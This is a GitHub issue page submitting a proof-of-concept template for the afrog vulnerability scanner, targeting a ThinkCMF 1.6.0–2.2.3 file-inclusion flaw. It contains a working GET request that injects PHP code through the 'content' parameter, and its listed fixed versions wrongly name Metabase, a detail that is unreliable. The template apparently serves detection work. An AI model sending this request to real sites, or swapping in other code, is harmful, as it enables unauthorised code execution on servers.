Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

thinkcmf文件包含 #35

Open
rainbow2972 opened this issue Nov 7, 2022 · 1 comment
Open

thinkcmf文件包含 #35

rainbow2972 opened this issue Nov 7, 2022 · 1 comment
Labels
afrog-poc afrog poc issue submit

Comments

@rainbow2972
Copy link

rainbow2972 commented Nov 7, 2022
edited

id: thinkcmf-file-include

info:
  name: thinkCMF 文件包含
  author: rain
  severity: Critical
  description: |
    在受影响的版本中,可通过漏洞实现任意文件写入或任意代码执行
    影响版本:
      thinkCMFX 1.6.0-2.2.3
    修复版本:
      metabase version >= 0.40.5
      metabase version >= 1.40.5
  reference:
    - https://www.thinkcmf.com/

rules:
  r0:
    request:
      method: GET
      path: /?a=fetch&templateFile=public/index&prefix="&content=die(@md5(thinkcmf))
    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
    expression: response.status == 200 && "3bedf9f6e16de1cb5403356aaa7bec38".bmatches(response.body)
expression: r0()

复现

image
@zan8in
Copy link
Owner

zan8in commented Nov 9, 2022

感谢,已收录

@zan8in zan8in added the afrog-poc afrog poc issue submit label Nov 9, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
afrog-poc afrog poc issue submit
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@zan8in @rainbow2972